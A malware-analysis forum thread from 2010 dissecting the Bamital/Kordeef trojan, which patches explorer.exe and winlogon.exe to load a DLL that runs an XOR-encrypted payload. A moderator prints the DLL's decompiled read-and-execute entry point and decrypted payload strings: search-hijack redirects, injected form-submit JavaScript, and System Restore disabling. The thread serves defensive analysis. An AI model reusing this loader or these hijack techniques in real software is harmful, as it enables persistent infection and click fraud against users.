Win32/Bamital

Forum for analysis and discussion about malware.

Win32/Bamital

Postby markusg » Sat Dec 11, 2010 1:47 pm

Hi,
is Trojan.Kordeef a new one, could not find any infos.
removed 2 patched system files winlogon and explorer.exe from infected machine.
files attached.
http://www.virustotal.com/file-scan/rep ... 1292072505
http://www.virustotal.com/file-scan/rep ... 1292072830
You do not have the required permissions to view the files attached to this post.
markusg
 
Posts: 713
Joined: Mon Mar 15, 2010 2:53 pm
Reputation point: 141

Re: Trojan.Kordeef  (patched files)

Postby 4everyone » Sat Dec 11, 2010 2:23 pm

Bamital used to patch WInlogon.exe & Explorer.exe. Trojan.Kordeef looks new for me.. Lemme check whether i can find any difference between Bamital & Kordeef :)

BTB,

Bamital posts can be found here..

http://www.kernelmode.info/forum/viewtopic.php?f=16&t=19&p=2095&hilit=bamital#p2095
4everyone
 
Posts: 23
Joined: Fri Jul 16, 2010 1:59 am
Reputation point: 5

Re: Trojan.Kordeef  (patched files)

Postby EP_X0FF » Sat Dec 11, 2010 5:22 pm

Is the any kb.dll available? :)
I see it loads it on overwritten entry point (explorer.exe)
Ring0 - the source of inspiration
User avatar
EP_X0FF
Global Moderator
 
Posts: 4764
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation
Reputation point: 571

Re: Trojan.Kordeef  (patched files)

Postby markusg » Sat Dec 11, 2010 6:31 pm

sorry yes :-)
You do not have the required permissions to view the files attached to this post.
markusg
 
Posts: 713
Joined: Mon Mar 15, 2010 2:53 pm
Reputation point: 141

Re: Trojan.Kordeef  (patched files)

Postby EP_X0FF » Sun Dec 12, 2010 3:50 am

Sorry, but there seems to be also another file named C:\WINDOWS\system32\dll
Can you please upload it? :)

Code: Select all
BOOL __stdcall DllEntryPoint(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
{
  void *pCode;
  if ( fdwReason == 1 )
  {
    pCode = ReadExecutableCode("C:\\WINDOWS\\system32\\dll");
    if ( pCode )
      ((void (__thiscall *)(_DWORD))pCode)(pCode);
  }
  return 0;
}
Ring0 - the source of inspiration
User avatar
EP_X0FF
Global Moderator
 
Posts: 4764
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation
Reputation point: 571

Re: Trojan.Kordeef  (patched files)

Postby markusg » Sun Dec 12, 2010 10:34 am

ok there is an other one
You do not have the required permissions to view the files attached to this post.
markusg
 
Posts: 713
Joined: Mon Mar 15, 2010 2:53 pm
Reputation point: 141

Re: Trojan.Kordeef  (patched files)

Postby EP_X0FF » Sun Dec 12, 2010 10:48 am

Maybe I should be more clear regarding this viewtopic.php?p=3943#p3943 :)

The code above is what exactly doing this kb.dll loaded by patched explorer.exe

kb.dll reads file named C:\WINDOWS\System32\dll and then executes it.

That's why I'm asking about this file because it can help to understand how does all this puzzle work :)
Ring0 - the source of inspiration
User avatar
EP_X0FF
Global Moderator
 
Posts: 4764
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation
Reputation point: 571

Re: Trojan.Kordeef  (patched files)

Postby markusg » Sun Dec 12, 2010 10:55 am

ok sorry. i have understand it wrong, i have at first to search this file. its not removed yet. give me a bit time :-)
markusg
 
Posts: 713
Joined: Mon Mar 15, 2010 2:53 pm
Reputation point: 141

Re: Trojan.Kordeef  (patched files)

Postby markusg » Sun Dec 12, 2010 5:26 pm

i found on an other pc perhaps an dropper.
it creates same dll files.
You do not have the required permissions to view the files attached to this post.
markusg
 
Posts: 713
Joined: Mon Mar 15, 2010 2:53 pm
Reputation point: 141

Re: Trojan.Kordeef  (patched files)

Postby EP_X0FF » Sun Dec 12, 2010 5:53 pm

Yes you right, this is dropper.

Dropper VT result
http://www.virustotal.com/file-scan/rep ... 1292176900

C:'\Windows\System32\dll is payload code, encrypted by xor.

Once infected explorer.exe starts in loads kb.dll which reads C:\windows\system32\dll and then kb.dll executes it.

Infected Explorer.exe/Winlogon.exe --> C:\Windows\system32\kb.dll --> Read/Execute --> C:\Windows\System32\dll --> Decrypt/Execute --> Profit :)

New code decrypts itself in simple loop

Image

and then executes all the rest.

String data from decrypted "dll"

15 X_if _if c h r o m e . e x e f i r e f o x . e x e o p e r a . e x e i e x p l o r e . e x e GET HTTP/1.1
Host: &version= Run Software\Microsoft\Windows\CurrentVersion\Explorer\LowRegistry Flag GetUserGeoID SYSTEM\CurrentControlSet\Services\sr\Parameters
SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore FirstRun DisableSR \user32.dll kb.dll k b . d l l
\updhlp.dat open -new-window <script src="http:// " type="text/javascript"></script> Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
19792079 [%subid] <d> </d> <m> </m> <e> </e> <f> </f> <j> </j> <c> </c> <u> </u> <t> </t> <p> </p> <k> </k> <b> </b> <p> </p> <k> </k> [%key] [%subid] </ul>
google.com/ Date: X55 Fut 2999 </title> <r> </r> **http%3a// User-Agent: Accept-Encoding: Content-Type: text/html GET /search GET /s? google. search.yahoo.com
bing.com ?subid= &id= .info/message.php \temp.ini \user32.dll TimeGetWork Uses32 ExitTime Ver Decode Domen Flags \admin.txt .gif .jp .png .js .ico .css .aspx /
iexplore.exe .upd & q= p= text= "> % <d> </d> <s> </s> <i> </i> &HTTP_REFERER= \ PROCESSOR_IDENTIFIER &os= &br= IE Op FF Ch &flg= &ad= &ver= \server.dat \Windows
\winhelp.exe Exists555 Explorer555 Global\EventHlpFile Global\EventHlpFile2 HlpMap555
<title> - porno yschttl spt" href="http:// <div><a href="http://rds.yahoo.com <em> </em> <a href="http:// sb_tlst"><h3><a href="http:// 
class="sb_ads <a href="http:// " <em> </em> 19091979 \Server HTTP/1.1 302 Moved Temporarily
Location: Connection: keep-alive
Content-Length: 0
Connection: close
HTTP/1.1 200 OK
<html><head><script language="JavaScript">function f(){var form = document.forms["rr"];form.submit();}if(document.cookie=="")
{if (history.length!=0) document.cookie="k=1";window.onload=f;}else{document.cookie="k=1;expires=Mon, 01-Jan-2001 00:00:00 GMT";history.back();}</script></head><body><form action="http:// " method="post" name="rr"></form></body></html> 8 / <html><head></head><body><script type="text/javascript">location.href="http:// ";
</script></body></html> N0
<title> </title> <meta keyword > </head> Content-Length: Accept-Encoding: </body> </html> Host: Referer: http:// gzip sdch none HTTP/1. 200 OK _
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)


decrypted stuff attached
You do not have the required permissions to view the files attached to this post.
Ring0 - the source of inspiration
User avatar
EP_X0FF
Global Moderator
 
Posts: 4764
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation
Reputation point: 571

Next

Return to Malware

Who is online

Users browsing this forum: Ludvig and 14 guests